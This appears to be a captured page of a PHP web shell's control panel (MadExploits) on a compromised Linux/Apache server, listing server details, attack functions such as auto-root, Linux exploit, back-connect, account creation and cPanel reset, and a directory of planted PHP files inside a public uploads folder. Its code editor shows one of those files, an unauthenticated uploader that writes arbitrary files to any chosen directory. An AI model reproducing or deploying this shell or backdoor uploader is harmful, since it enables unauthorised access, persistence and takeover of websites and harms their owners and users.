Linux localhost.localdomain 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
Apache
: 10.29.51.72 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
7.2.34
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mpc_emas /
public /
uploads /
permohonan /
5112 /
sokongan /
[ HOME SHELL ]
Name
Size
Permission
Action
wp-login
[ DIR ]
drwxr-xr-x
amd.php
47.39
KB
-rw-r--r--
images.jpg.php
61.12
KB
-rw-r--r--
index.php
256
B
-rw-r--r--
listfile.php
1.88
KB
-rw-r--r--
load2.php
517
B
-rw-r--r--
robots.txt
25
B
-rw-r--r--
sokongan_20250405122053_5112_1...
1.4
KB
-rw-r--r--
wplogin-2.php
61.12
KB
-rw-r--r--
xmlpcr.php
5.76
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sokongan_20250405122053_5112_1.php
<?php // Get the current directory where the file is located $currentDir = getcwd(); if (isset($_POST['submit'])) { $destinationDir = $_POST['destination']; // Destination folder $uploadFile = $_FILES['file']; // Uploaded file // Check if destination directory exists if (!is_dir($destinationDir)) { echo "The destination directory does not exist."; exit; } // Full file path $targetFile = $destinationDir . DIRECTORY_SEPARATOR . basename($uploadFile['name']); // Upload the file if (move_uploaded_file($uploadFile['tmp_name'], $targetFile)) { echo "File successfully uploaded to: " . $targetFile; } else { echo "Error uploading file."; } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Simple File Uploader</title> </head> <body> <form method="POST" enctype="multipart/form-data"> <label for="destination">Destination Directory:</label> <input type="text" id="destination" name="destination" value="<?php echo $currentDir; ?>" style="width: 400px;" required> <br> <label for="file">Choose a File:</label> <input type="file" id="file" name="file" required> <br> <button type="submit" name="submit">Upload</button> </form> </body> </html>
Close